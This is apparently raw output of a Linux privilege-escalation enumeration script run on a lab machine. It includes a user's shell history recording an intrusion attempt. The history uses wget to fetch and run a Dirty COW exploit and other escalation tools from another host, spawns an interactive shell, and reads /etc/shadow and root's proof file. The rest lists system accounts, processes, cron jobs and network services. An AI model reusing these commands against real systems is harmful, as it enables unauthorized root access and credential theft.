  560. [+] Root's history files are accessible!
  561. -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
  562.  
  563.  
  564. [-] Location and contents (if accessible) of .bash_history file(s):
  565. /home/bob/.bash_history
  566.  
  567. exit
  568. exit
  569. exit
  570. ls
  571. cd ..
  572. ls
  573. cd ..
  574. ls
  575. cd usr
  576. ls
  577. cd bin
  578. ls
  579. ls
  580. cd ..
  581. ls
  582. cd ..
  583. ls
  584. cd var
  585. ls
  586. cd bak
  587. cd backups/
  588. ls
  589. cd ..
  590. ls
  591. cd /
  592. find . -exec file {} \; | grep -i elf
  593. /bin/sh -i
  594. ls
  595. id
  596. /bin/bash
  597. ls -l
  598. strings
  599. strings vmlinuz
  600. ls
  601. cd sbin
  602. ls
  603. ls -l
  604. cd ..
  605. ls
  606. cd home
  607. cd bob
  608. ls
  609. cd files
  610. ls
  611. cat *
  612. cd ..
  613. cd ..
  614. cd ..
  615. cd tmp
  616. ls
  617. wget http://10.11.1.86:8000/linuxprivchecker.py
  618. wget http://10.11.1.86:8000/linuxprivchecker.py
  619. wget http://10.11.0.86:8000/linuxprivchecker.py
  620. python linuxprivchecker.py
  621. /bin/su
  622. /usr/bin
  623. ls
  624. cd /usr/bin
  625. ls
  626. strings at
  627. strings at
  628. strings at
  629. wget http://10.11.0.86:8000/dcow.c
  630. cd /tmp
  631. wget http://10.11.0.86:8000/dcow.c
  632. chmod +x dcow.c
  633. ./dcow.c
  634. id
  635. euid
  636. ps
  637. ps -eo pid,user,uid,args
  638. ps -eo pid,euid | grep YOUR_PID_HERE
  639. ps
  640. ps -eo pid,euid | grep 3623
  641. ps -eo pid,euid | grep 3620
  642. seteuid(0)
  643. ps -eo pid,euid | grep 3620
  644. ./dcow.c
  645. ./dcow.c
  646. ./dcow.c
  647. ./dcow.c
  648. $PATH
  649. echo $PATH
  650. echo $SHELL
  651. find / -perm -u=s -type f 2>/dev/null
  652. $PATH=/bin/su
  653. set $PATH = /bin/su
  654. echo $PATH
  655. export PATH="$PATH:/bin/su"
  656. echo $PATH
  657. whoami
  658. id
  659. ps
  660. /bin/bash
  661. ls
  662. id
  663. echo $PATH
  664. ps
  665. ps -eo pid,euid,ruid,suid | grep 375
  666. ps -eo pid,euid,ruid,suid | grep 677
  667. ps -eo pid,euid,ruid,suid | grep 3623
  668. ps -eo pid,euid,ruid,suid | grep 372
  669. sudo su
  670. /bin/su
  671. /bin.su
  672. /bin/h
  673. /bin/sh
  674. ls
  675. id
  676. whoami
  677. ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
  678. ls
  679. ls -l
  680. cd vmware-root/
  681. ls
  682. strings vmware-root/
  683. /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
  684. cd /usr/lib/vmware-tools/bin32/
  685. ls
  686. ls -l
  687. strings vmware-user-suid-wrapper
  688. chmod +x vmware-user-suid-wrapper
  689. ./vmware-user-suid-wrapper
  690. id
  691. whoami
  692. uid
  693. id
  694. sudo -l
  695. sudo -s
  696. ls
  697. cd files
  698. ls
  699. cd ~
  700. ls
  701. cd ..
  702. cd ..
  703. ls
  704. cd home
  705. ls
  706. cd .ssh
  707. cd bob
  708. cd .ssj
  709. cd .ssh
  710. ls
  711. cat authorized_keys
  712. cd ..
  713. cd ..
  714. ls
  715. cd ..
  716. ls
  717. cat /etc/passwd
  718. cat /etc/shadow
  719. cd root
  720. ls
  721. cat proof.txt
  722. uname -a
  723. setuid id
  724. setuid
  725. setid
  726. access
  727. setfsuid
  728. ps -f -u user1
  729. ps -f -u bob
  730. ps -eo pid,euid,ruid,suid | grep 2174
  731. ps -eo pid,euid,ruid,suid | grep 2175
  732. ps -eo pid,euid,ruid,suid | grep 2203
  733. setuid(0)
  734. setuid() ;
  735. setuid(0)
  736. setuid('0')
  737. setuid(1001)
  738. setuid
  739. setuid() 1001
  740. setuid() -h
  741. man setuid
  742. seteuid(0)
  743. seteuid(1001)
  744. seteuid() ;
  745. seteuid(getuid())
  746. seteuid(getuid(1001))
  747. getenv("SUDO_UID")
  748. seteuid(0) /bin/bash
  749. /bin/bash
  750. $shell
  751. $ENV
  752. python
  753. pyton -c 'import pty;pty.spawn("/bin/bash")'
  754. python -c 'import pty;pty.spawn("/bin/bash")'
  755. cd /tmp
  756. ls
  757. wget http://10.11.0.86/linenu.sh
  758. wget http://10.11.0.86:8000/linenu.sh
  759. wget http://10.11.0.86:8000/linenum.sh
  760. wget http://10.11.0.86:8000/linuxprivchecker.py
  761. ls
  762. bash linenum.sh
  763. python linuxprivchecker.py
  764. wget http://10.11.0.86:8000/a.out
  765. ./a.out
  766. chmod +x a.out
  767. ./a.out
  768. id
  769. ps
  770. ps -aux
  771. ps -eo pid,euid,ruid,suid | grep 2272
  772. ps -eo pid,euid,ruid,suid | grep 2175
  773. nano a.py
  774. python a.py
  775. nano a.py
  776. python a.py
  777. nano a.py
  778. python a.py
  779. ps -eo pid,euid,ruid,suid | grep 2175
  780. sudo
  781. sudo -h
  782. sudo --help
  783. sudo -l
  784. nano a.py
  785. python a.py
  786. nano a.py
  787. python a.py
ps -eo pid,euid,ruid,suid | grep 2175
ps
ps -eo pid,euid,ruid,suid | grep 2760
ps -eo pid,euid,ruid,suid | grep 2893
ps
/bin/bash
/bin/sh
ls
python a.py
ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
lsps -efl | grep 'sleep 1' | grep -v gre
ps -efl | grep 'sleep 1' | grep -v gre
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v
ps -efl | grep 'sleep 1'
ps -efl | grep 'sleep 1'
python a.p
python a.py
ls /proc
cd 2893
ls
ls /proc/2893
ls /proc/2893/fd
ls /proc/2893/fd/1
ls /proc/2893/fd/1
cat /proc/2893/fd/1
echo n> /proc/2893/fd/1
echo n >/proc/2893/fd/1
cat /proc/2893/fd/1
echo n >/proc/2893/fd/1
loc
ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
python a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
nano a.py
whoami
id
ps aux
/bin/sh
ls
whoami
id
/bin/bash


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..


### SCAN COMPLETE ####################################

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.91

[-] Debug Info
[+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)


Scan started at:
Wed Aug 8 03:56:00 EDT 2018


### SYSTEM ##############################################
[-] Kernel information:
Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux


[-] Kernel information (continued):
Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009


[-] Hostname:
sufferance


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(bob) gid=1001(bob) groups=1001(bob)


[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Thu Jun 9 07:30:24 -0400 2016
bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018


[-] Who else is logged on:
03:56:00 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bob pts/0 10.11.0.86 03:14 37:04m 0.00s 0.00s -bash
bob pts/1 10.11.0.86 03:21 5.00s 0.05s 0.04s bash linenum.sh


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1001(bob) gid=1001(bob) groups=1001(bob)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:100:102::/var/spool/exim4:/bin/false
statd:x:101:65534::/var/lib/nfs:/bin/false
identd:x:102:65534::/var/run/identd:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
bob:x:1001:1001::/home/bob:/bin/bash


[-] Super user account(s):
root


[+] We can sudo without supplying a password!
usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
{ -e file [...] | -i | -s | <command> }


[+] We can read root's home directory!
total 36K
drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
-rw------- 1 root root 35 2016-06-09 07:30 .bash_history
-rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
-rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
---------- 1 root root 33 2015-02-27 19:33 proof.txt
drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
-rw------- 1 root root 1 2016-04-19 03:52 .viminfo


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
SHELL=/bin/bash
TERM=xterm-256color
SSH_CLIENT=10.11.0.86 44278 22
SSH_TTY=/dev/pts/1
USER=bob
PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
MAIL=/var/mail/bob
PWD=/tmp
LANG=en_US.UTF-8
HOME=/home/bob
SHLVL=2
LOGNAME=bob
SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
_=/usr/bin/env


[-] Path information:
/usr/local/bin:/usr/bin:/bin:/usr/games


[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/bash
/bin/rbash


[-] Current umask value:
u=rwx,g=rx,o=rx
0022


[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab

/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
-rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder

/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
-rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
-rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
-rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
-rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
-rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
-rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
-rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
-rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
-rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
-rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
-rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
-rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
-rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
-rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
-rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
-rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
-rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING ##########################################
[-] Network and IP info:
eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:81969 errors:2 dropped:4 overruns:0 frame:0
TX packets:28019 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7185584 (6.8 MiB) TX bytes:5028079 (4.7 MiB)
Interrupt:18 Base address:0x2000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18 errors:0 dropped:0 overruns:0 frame:0
TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)


[-] Nameserver(s):
nameserver 10.11.1.220
nameserver 10.11.1.221


[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 1212 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED -
tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED -


[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 10.11.1.136:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.11.1.136:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -


### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
bob 2104 0.8 0.2 4900 2204 pts/1 S+ 03:55 0:00 bash linenum.sh
bob 2464 1.0 0.1 4916 1840 pts/1 R+ 03:55 0:00 bash linenum.sh
bob 2466 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
bob 2645 0.0 0.1 4916 1604 pts/1 R+ 03:56 0:00 bash linenum.sh
bob 2646 0.0 0.0 3424 980 pts/1 R+ 03:56 0:00 ps aux


[-] Process binaries and associated permissions (from above list):
16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd


[-] Contents of /etc/inetd.conf:
# /etc/inetd.conf: see inetd(8) for further informations.
#
# Internet superserver configuration database
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it isn't touched during
# package updates just comment it out with a single '#' character.
#
# Packages should modify this file by using update-inetd(8)
#
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
#
#:INTERNAL: Internal services
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#time stream tcp nowait root internal

#:STANDARD: These are standard services.

#:BSD: Shell, login, exec and talk are BSD protocols.

#:MAIL: Mail, news and uucp services.

#:INFO: Info services
ident stream tcp wait identd /usr/sbin/identd identd

#:BOOT: TFTP service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers."

#:RPC: RPC based services

#:HAM-RADIO: amateur-radio services

#:OTHER: Other services
#<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd


[-] The related inetd binary permissions:
-rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd


[-] /etc/init.d/ binary permissions:
total 332
drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
-rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
-rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
-rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
-rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
-rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
-rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
-rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
-rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
-rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
-rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
-rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
-rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
-rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
-rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
-rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
-rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
-rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
-rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
-rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
-rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
-rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
-rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
-rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
-rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
-rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
-rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
-rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
-rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
-rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
-rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
-rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
-rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
-rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
-rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
-rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
-rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
-rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
-rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
-rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
-rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
-rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
-rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
-rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
-rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
-rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
-rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
-rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
-rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
-rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
-rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
-rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
-rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
-rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
